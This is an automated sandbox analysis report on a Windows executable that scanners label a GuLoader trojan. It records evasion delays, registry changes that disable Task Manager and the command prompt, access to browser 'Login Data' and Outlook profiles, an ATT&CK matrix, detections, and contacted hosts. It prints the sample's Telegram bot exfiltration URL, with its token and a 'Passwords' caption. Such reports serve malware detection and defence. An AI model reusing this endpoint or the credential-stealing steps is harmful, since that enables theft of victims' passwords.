            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -597359s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -597204s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -597082s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -596945s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -596843s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -596734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -596624s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -596515s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -596406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -596296s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -596187s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -596078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -595965s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -595859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -595750s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -595640s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -595531s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -595421s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -595312s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -595203s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -595093s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -594984s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -594874s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -594765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -594655s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -594514s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -594288s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 0_2_0040672B FindFirstFileW,FindClose,0_2_0040672B
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AFA
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_00402868 FindFirstFileW,4_2_00402868
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_0040672B FindFirstFileW,FindClose,4_2_0040672B
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405AFA
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 599843Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 599652Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 599546Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 599218Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 598999Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 598890Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 598671Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 598562Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 598450Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 598339Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 598234Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 598125Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 598015Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 597906Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 597794Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 597687Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 597578Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 597468Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 597359Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 597204Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 597082Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 596945Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 596843Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 596734Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 596624Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 596515Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 596406Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 596296Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 596187Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 596078Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 595965Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 595859Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 595750Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 595640Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 595531Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 595421Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 595312Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 595203Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 595093Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 594984Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 594874Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 594765Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 594655Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 594514Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 594288Jump to behavior
            Source: ZaRP7yvL1J.exe, 00000004.00000002.2932353178.0000000005827000.00000004.00000020.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000002.2932353178.00000000057C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: ZaRP7yvL1J.exe, 00000004.00000002.2932353178.0000000005827000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWa
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeAPI call chain: ExitProcess graph end nodegraph_0-4588
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeAPI call chain: ExitProcess graph end nodegraph_0-4746
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 0_2_6F951B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6F951B5F
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess created: C:\Users\user\Desktop\ZaRP7yvL1J.exe "C:\Users\user\Desktop\ZaRP7yvL1J.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeQueries volume information: C:\Users\user\Desktop\ZaRP7yvL1J.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeRegistry value created: DisableTaskMgr 1Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeRegistry value created: DisableCMD 1Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000004.00000002.2950226933.0000000035E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ZaRP7yvL1J.exe PID: 3052, type: MEMORYSTR
            Source: Yara matchFile source: 00000004.00000002.2950226933.0000000035E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ZaRP7yvL1J.exe PID: 3052, type: MEMORYSTR
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000004.00000002.2950226933.0000000035E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ZaRP7yvL1J.exe PID: 3052, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000004.00000002.2950226933.0000000035E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ZaRP7yvL1J.exe PID: 3052, type: MEMORYSTR
            Source: Yara matchFile source: 00000004.00000002.2950226933.0000000035E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ZaRP7yvL1J.exe PID: 3052, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            1
            Masquerading
            1
            OS Credential Dumping
            21
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
            Process Injection
            31
            Disable or Modify Tools
            LSASS Memory31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            1
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Process Injection
            LSA Secrets2
            File and Directory Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information
            Cached Domain Credentials215
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            ZaRP7yvL1J.exe58%ReversingLabsWin32.Trojan.GuLoader
            ZaRP7yvL1J.exe75%VirustotalBrowse
            ZaRP7yvL1J.exe100%AviraHEUR/AGEN.1337946
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nszB803.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://api.telegram.orgp0%Avira URL Cloudsafe
            http://checkip.dyndns.orgp0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            142.250.186.142
            truefalse
              high
              drive.usercontent.google.com
              142.250.185.129
              truefalse
                high
                reallyfreegeoip.org
                104.21.16.1
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    193.122.6.168
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://checkip.dyndns.org/false
                          high
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            high
                            https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.google.comZaRP7yvL1J.exe, 00000004.00000003.2484098617.000000000583E000.00000004.00000020.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000003.2484170673.000000000583E000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://checkip.dyndns.orgpZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035F7B000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://api.telegram.orgZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035F7B000.00000004.00000800.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035F21000.00000004.00000800.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000002.2950226933.000000003608E000.00000004.00000800.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035E4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://drive.usercontent.google.com/hobfZaRP7yvL1J.exe, 00000004.00000002.2932353178.0000000005835000.00000004.00000020.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000003.2523839008.000000000583E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.org/botZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035E4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://translate.google.com/translate_a/element.jsZaRP7yvL1J.exe, 00000004.00000003.2484098617.000000000583E000.00000004.00000020.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000003.2484170673.000000000583E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://drive.google.com/ZaRP7yvL1J.exe, 00000004.00000002.2932353178.00000000057C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035E4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://reallyfreegeoip.orgZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035DB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://api.telegram.orgpZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035F21000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://reallyfreegeoip.orgZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035DA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://drive.usercontent.google.com/ZaRP7yvL1J.exe, 00000004.00000002.2932353178.0000000005835000.00000004.00000020.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000003.2523839008.000000000583E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://checkip.dyndns.org/_ZaRP7yvL1J.exe, 00000004.00000002.2951594871.0000000038912000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://checkip.dyndns.orgZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035F7B000.00000004.00000800.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035DA0000.00000004.00000800.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035F21000.00000004.00000800.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035D94000.00000004.00000800.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000002.2950226933.000000003608E000.00000004.00000800.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035E4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://apis.google.comZaRP7yvL1J.exe, 00000004.00000003.2484098617.000000000583E000.00000004.00000020.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000003.2484170673.000000000583E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://checkip.dyndns.comZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035F7B000.00000004.00000800.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035DA0000.00000004.00000800.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035F21000.00000004.00000800.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000002.2950226933.000000003608E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://nsis.sf.net/NSIS_ErrorErrorZaRP7yvL1J.exefalse
                                                            high
                                                            http://api.telegram.orgZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035F7B000.00000004.00000800.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035F21000.00000004.00000800.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000002.2950226933.000000003608E000.00000004.00000800.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035E4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035D21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://reallyfreegeoip.org/xml/ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035DA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  149.154.167.220
                                                                  api.telegram.orgUnited Kingdom
                                                                  62041TELEGRAMRUfalse
                                                                  142.250.185.129
                                                                  drive.usercontent.google.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  104.21.16.1
                                                                  reallyfreegeoip.orgUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  193.122.6.168
                                                                  checkip.dyndns.comUnited States
                                                                  31898ORACLE-BMC-31898USfalse
                                                                  142.250.186.142
                                                                  drive.google.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                  Analysis ID:1588945
                                                                  Start date and time:2025-01-11 07:29:33 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 7m 28s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:6
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:ZaRP7yvL1J.exe
                                                                  renamed because original name is a hash value
                                                                  Original Sample Name:ef36fbce388a09cd4c3374d0d9dda194745f76edd41dad82e8763ed35abc0299.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@3/8@5/5
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HCA Information:
                                                                  • Successful, ratio: 96%
                                                                  • Number of executed functions: 160
                                                                  • Number of non-executed functions: 113
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 173.222.162.32, 52.149.20.212, 13.107.246.45
                                                                  • Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  TimeTypeDescription
                                                                  01:32:01API Interceptor255x Sleep call for process: ZaRP7yvL1J.exe modified
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  149.154.167.220grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                    14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                            lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                  n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      104.21.16.1NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.kkpmoneysocial.top/86am/
                                                                                      JNKHlxGvw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
